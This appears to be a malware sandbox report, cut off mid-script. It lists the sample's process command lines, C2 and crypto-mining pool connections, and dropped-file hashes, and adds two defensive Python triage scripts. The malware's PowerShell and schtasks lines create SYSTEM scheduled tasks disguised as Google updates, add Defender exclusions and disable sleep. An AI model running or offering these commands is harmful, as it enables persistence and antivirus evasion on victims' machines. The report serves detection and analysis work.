C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe
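The command lines above carry the whole persistence and defence-evasion chain, but the first powershell.exe invocation is base64/UTF-16LE encoded and the others are padded with junk block comments (`<#ooufdlmmm#>`). The script below is an added example, not code from the sandbox or from the page, that decodes `-EncodedCommand`, strips the block comments and tags each command line; the sample command lines are copied from the Processes section above, and the tag names (`defender-exclusion`, `scheduled-task-create`, `elevated-task`, `power-settings-tamper`) are this example's own, not the sandbox's signature names.

```python
"""Decode and classify the powershell / schtasks / powercfg command lines from the Processes section."""
import base64
import re

# Constructed sample: command lines copied from this report's Processes section (behavioral1).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAawBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegBsACMAPgA="',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force',
    r'"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f',
    r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }""",
    r'C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0',
    r'C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"',
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand (case-insensitive); the value is base64 of UTF-16LE.
ENCODED_FLAG = re.compile(r'(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+"?([A-Za-z0-9+/=]{16,})"?')
BLOCK_COMMENT = re.compile(r'<#.*?#>', re.DOTALL)

# Classification rules are this example's own names, not the sandbox's signature names.
RULES = [
    ('defender-exclusion', re.compile(r'Add-MpPreference\b.*-ExclusionPath', re.I)),
    ('scheduled-task-create', re.compile(r'schtasks(?:\.exe)?"?\s+/create|Register-ScheduledTask', re.I)),
    ('scheduled-task-run', re.compile(r'schtasks(?:\.exe)?"?\s+/run', re.I)),
    ('elevated-task', re.compile(r"/rl\s+highest|-RunLevel\s+'?Highest|/ru\s+'?System", re.I)),
    ('power-settings-tamper', re.compile(r'powercfg\s+/x\s+-(?:standby|hibernate)-timeout', re.I)),
]


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if the line is not encoded."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def normalize_script(text):
    """Remove <# ... #> block comments used as junk padding and collapse whitespace."""
    return ' '.join(BLOCK_COMMENT.sub(' ', text).split())


def effective_command(cmdline):
    """The command as PowerShell/cmd actually executes it: decoded if encoded, then de-padded."""
    decoded = decode_encoded_command(cmdline)
    return normalize_script(decoded if decoded is not None else cmdline)


def classify(script):
    return [name for name, rx in RULES if rx.search(script)]


def exclusion_paths(script):
    """Paths handed to -ExclusionPath, written either as @(a, b) or as a single bare value."""
    m = re.search(r'-ExclusionPath\s+(@\([^)]*\)|\S+)', script, re.I)
    if not m:
        return []
    raw = m.group(1)
    if raw.startswith('@('):
        raw = raw[2:-1]
    return [p.strip().strip('\'"') for p in raw.split(',') if p.strip()]


def triage(cmdlines):
    """One finding per command line that matches at least one rule."""
    findings = []
    for cmd in cmdlines:
        script = effective_command(cmd)
        tags = classify(script)
        if tags:
            findings.append({'script': script, 'tags': tags, 'exclusions': exclusion_paths(script)})
    return findings


if __name__ == '__main__':
    for f in triage(SAMPLE_CMDLINES):
        print(', '.join(f['tags']), '::', f['script'][:110])
```

Decoding the encoded line shows `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`: the first Defender exclusion covers the whole system drive, which is wider than the plaintext variant's `$env:ProgramFiles`. Matching on the normalised text rather than the raw command line is what makes the rule survive the junk comments and the encoding.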
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
| DE | 193.161.193.99:40382 | NareReti-40382.portmap.host | tcp |
Files
memory/1064-0-0x000007FEF5690000-0x000007FEF607C000-memory.dmp
memory/1064-1-0x0000000000F80000-0x00000000052AC000-memory.dmp
memory/1064-2-0x000000001F470000-0x000000001F4F0000-memory.dmp
\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
C:\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
C:\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\python311.dll
| MD5 | 5792adeab1e4414e0129ce7a228eb8b8 |
| SHA1 | e9f022e687b6d88d20ee96d9509f82e916b9ee8c |
| SHA256 | 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967 |
| SHA512 | c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b |
C:\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
memory/2592-37-0x000000001B450000-0x000000001B732000-memory.dmp
memory/2592-38-0x00000000025E0000-0x00000000025E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\_MEI27522\python311.dll
| MD5 | 5792adeab1e4414e0129ce7a228eb8b8 |
| SHA1 | e9f022e687b6d88d20ee96d9509f82e916b9ee8c |
| SHA256 | 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967 |
| SHA512 | c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b |
memory/2592-40-0x000007FEF1FA0000-0x000007FEF293D000-memory.dmp
memory/2592-41-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2592-42-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2592-43-0x000007FEF1FA0000-0x000007FEF293D000-memory.dmp
memory/2668-44-0x000007FEEC1A0000-0x000007FEEC789000-memory.dmp
memory/2592-45-0x000000000296B000-0x00000000029D2000-memory.dmp
\Users\Admin\AppData\Local\Temp\mainPannel.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
C:\Users\Admin\AppData\Local\Temp\UI.exe
| MD5 | a6d1f2686c50110de2fd76df4dcb7057 |
| SHA1 | 75f47ac32fada1bb9371b45006c2b1744347790a |
| SHA256 | ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446 |
| SHA512 | f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66 |
C:\Users\Admin\AppData\Local\Temp\UI.exe
| MD5 | a6d1f2686c50110de2fd76df4dcb7057 |
| SHA1 | 75f47ac32fada1bb9371b45006c2b1744347790a |
| SHA256 | ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446 |
| SHA512 | f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66 |
C:\Users\Admin\AppData\Local\Temp\GC.exe
| MD5 | b2bcd053c6452f8a04ba108d850f9781 |
| SHA1 | d69a9b01e46a84347317f93898c270b0df1fd4ca |
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
| SHA512 | e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe |
memory/1064-64-0x000007FEF5690000-0x000007FEF607C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UI.exe
| MD5 | a6d1f2686c50110de2fd76df4dcb7057 |
| SHA1 | 75f47ac32fada1bb9371b45006c2b1744347790a |
| SHA256 | ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446 |
| SHA512 | f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66 |
memory/1092-66-0x000007FEF5690000-0x000007FEF607C000-memory.dmp
memory/1092-65-0x0000000001150000-0x0000000001474000-memory.dmp
memory/1064-67-0x000007FEF5690000-0x000007FEF607C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\GC.exe
| MD5 | b2bcd053c6452f8a04ba108d850f9781 |
| SHA1 | d69a9b01e46a84347317f93898c270b0df1fd4ca |
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
| SHA512 | e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe |
memory/3040-68-0x0000000000FE0000-0x0000000001056000-memory.dmp
memory/3040-69-0x0000000074160000-0x000000007484E000-memory.dmp
\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
memory/2540-92-0x000000013F640000-0x0000000142ECE000-memory.dmp
memory/1092-93-0x0000000001030000-0x00000000010B0000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
| MD5 | b2bcd053c6452f8a04ba108d850f9781 |
| SHA1 | d69a9b01e46a84347317f93898c270b0df1fd4ca |
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
| SHA512 | e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe |
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
| MD5 | b2bcd053c6452f8a04ba108d850f9781 |
| SHA1 | d69a9b01e46a84347317f93898c270b0df1fd4ca |
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
| SHA512 | e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe |
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
| MD5 | b2bcd053c6452f8a04ba108d850f9781 |
| SHA1 | d69a9b01e46a84347317f93898c270b0df1fd4ca |
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
| SHA512 | e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe |
memory/1092-99-0x000007FEF5690000-0x000007FEF607C000-memory.dmp
memory/2480-100-0x000007FEF5690000-0x000007FEF607C000-memory.dmp
memory/2480-101-0x00000000001E0000-0x0000000000504000-memory.dmp
memory/3040-102-0x00000000048B0000-0x00000000048F0000-memory.dmp
memory/2480-103-0x000000001B400000-0x000000001B480000-memory.dmp
memory/1596-109-0x000000001B0E0000-0x000000001B3C2000-memory.dmp
memory/1596-110-0x0000000002630000-0x00000000026B0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\43NR5AJTUV2239IUQVQL.temp
| MD5 | cabd4fe252753a9759c60bcfae79db86 |
| SHA1 | 4debab789e3be1e9ce21670d68bcad9bfa9cdd7e |
| SHA256 | ec44e5549491030362d58c7c3e824b7e01fd826295dbc3cd3dc6c01296626203 |
| SHA512 | cd248ce4aa2356632ec3b0e81afb3eae65e75b28ca77d5baf9e9d44a80f1e28d0e4f16e328977d1620b792a7eed34e018266bb8cb89898cb74a63a3e7100bd69 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | cabd4fe252753a9759c60bcfae79db86 |
| SHA1 | 4debab789e3be1e9ce21670d68bcad9bfa9cdd7e |
| SHA256 | ec44e5549491030362d58c7c3e824b7e01fd826295dbc3cd3dc6c01296626203 |
| SHA512 | cd248ce4aa2356632ec3b0e81afb3eae65e75b28ca77d5baf9e9d44a80f1e28d0e4f16e328977d1620b792a7eed34e018266bb8cb89898cb74a63a3e7100bd69 |
memory/1596-112-0x000007FEED960000-0x000007FEEE2FD000-memory.dmp
memory/1596-111-0x0000000001F00000-0x0000000001F08000-memory.dmp
memory/1596-113-0x0000000002630000-0x00000000026B0000-memory.dmp
memory/1596-114-0x000007FEED960000-0x000007FEEE2FD000-memory.dmp
memory/1596-115-0x0000000002630000-0x00000000026B0000-memory.dmp
memory/1596-116-0x000007FEED960000-0x000007FEEE2FD000-memory.dmp
memory/2540-117-0x000000013F640000-0x0000000142ECE000-memory.dmp
memory/1212-125-0x000007FEECFC0000-0x000007FEED95D000-memory.dmp
memory/1212-124-0x00000000023B0000-0x00000000023B8000-memory.dmp
memory/1212-126-0x00000000023D0000-0x0000000002450000-memory.dmp
memory/1212-123-0x000000001AFF0000-0x000000001B2D2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | cabd4fe252753a9759c60bcfae79db86 |
| SHA1 | 4debab789e3be1e9ce21670d68bcad9bfa9cdd7e |
| SHA256 | ec44e5549491030362d58c7c3e824b7e01fd826295dbc3cd3dc6c01296626203 |
| SHA512 | cd248ce4aa2356632ec3b0e81afb3eae65e75b28ca77d5baf9e9d44a80f1e28d0e4f16e328977d1620b792a7eed34e018266bb8cb89898cb74a63a3e7100bd69 |
memory/1212-127-0x000007FEECFC0000-0x000007FEED95D000-memory.dmp
memory/1212-128-0x00000000023D0000-0x0000000002450000-memory.dmp
memory/3040-129-0x0000000074160000-0x000000007484E000-memory.dmp
memory/1212-130-0x00000000023D0000-0x0000000002450000-memory.dmp
memory/3040-131-0x00000000048B0000-0x00000000048F0000-memory.dmp
memory/2480-132-0x000007FEF5690000-0x000007FEF607C000-memory.dmp
memory/2480-133-0x000000001B400000-0x000000001B480000-memory.dmp
memory/1212-134-0x000007FEECFC0000-0x000007FEED95D000-memory.dmp
memory/3040-135-0x00000000048B0000-0x00000000048F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
memory/2540-137-0x000000013F640000-0x0000000142ECE000-memory.dmp
memory/2540-139-0x000000013F640000-0x0000000142ECE000-memory.dmp
\Program Files\Google\Chrome\updater.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
memory/3040-143-0x00000000048B0000-0x00000000048F0000-memory.dmp
memory/1996-144-0x000000013F360000-0x0000000142BEE000-memory.dmp
memory/1120-145-0x000007FEED960000-0x000007FEEE2FD000-memory.dmp
memory/1120-148-0x00000000011C0000-0x0000000001240000-memory.dmp
memory/1120-147-0x0000000019B00000-0x0000000019DE2000-memory.dmp
memory/1120-146-0x00000000011C0000-0x0000000001240000-memory.dmp
memory/1120-149-0x000007FEED960000-0x000007FEEE2FD000-memory.dmp
memory/1120-151-0x0000000000CF0000-0x0000000000CF8000-memory.dmp
memory/1996-150-0x000000013F360000-0x0000000142BEE000-memory.dmp
memory/1120-152-0x00000000011C0000-0x0000000001240000-memory.dmp
memory/1120-153-0x00000000011C0000-0x0000000001240000-memory.dmp
memory/1120-154-0x000007FEED960000-0x000007FEEE2FD000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2348-157-0x000007FEECFC0000-0x000007FEED95D000-memory.dmp
memory/2348-158-0x0000000001020000-0x00000000010A0000-memory.dmp
memory/2348-159-0x0000000001020000-0x00000000010A0000-memory.dmp
memory/2348-160-0x000007FEECFC0000-0x000007FEED95D000-memory.dmp
memory/2348-161-0x0000000001020000-0x00000000010A0000-memory.dmp
memory/2348-162-0x000007FEECFC0000-0x000007FEED95D000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
memory/1896-169-0x00000000001B0000-0x00000000001D0000-memory.dmp
memory/1996-168-0x000000013F360000-0x0000000142BEE000-memory.dmp
memory/1524-171-0x0000000140000000-0x000000014002A000-memory.dmp
memory/1896-172-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/1896-173-0x00000000003F0000-0x0000000000410000-memory.dmp
memory/1896-175-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/1896-176-0x00000000003F0000-0x0000000000410000-memory.dmp
memory/1896-178-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/1524-179-0x0000000140000000-0x000000014002A000-memory.dmp
memory/1896-180-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/1896-182-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/1896-184-0x0000000140000000-0x00000001407EF000-memory.dmp
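The Files listings of both detonations repeat the same hashes under different names, and the memory dump names encode the PID and the mapped range. The script below is an added example, not the sandbox's code, that indexes a pasted Files section by SHA256 to show which paths are one and the same binary, flags entries whose hash is that of zero bytes, and sizes the dumped regions per PID; the sample is a constructed excerpt of lines from the behavioral1 Files section above.

```python
"""Index a sandbox Files section by hash: same binary under several names, empty captures, region sizes."""
import hashlib
import re

# Constructed excerpt of this report's behavioral1 Files section, as it appears on the page.
SAMPLE_FILES = r"""
memory/1064-0-0x000007FEF5690000-0x000007FEF607C000-memory.dmp
\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
C:\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
C:\Users\Admin\AppData\Local\Temp\GC.exe
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
memory/2540-92-0x000000013F640000-0x0000000142ECE000-memory.dmp
\Program Files\Google\Chrome\updater.exe
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
memory/1996-144-0x000000013F360000-0x0000000142BEE000-memory.dmp
"""

HASH_ROW = re.compile(r'^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$')
MEM_LINE = re.compile(r'^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$')
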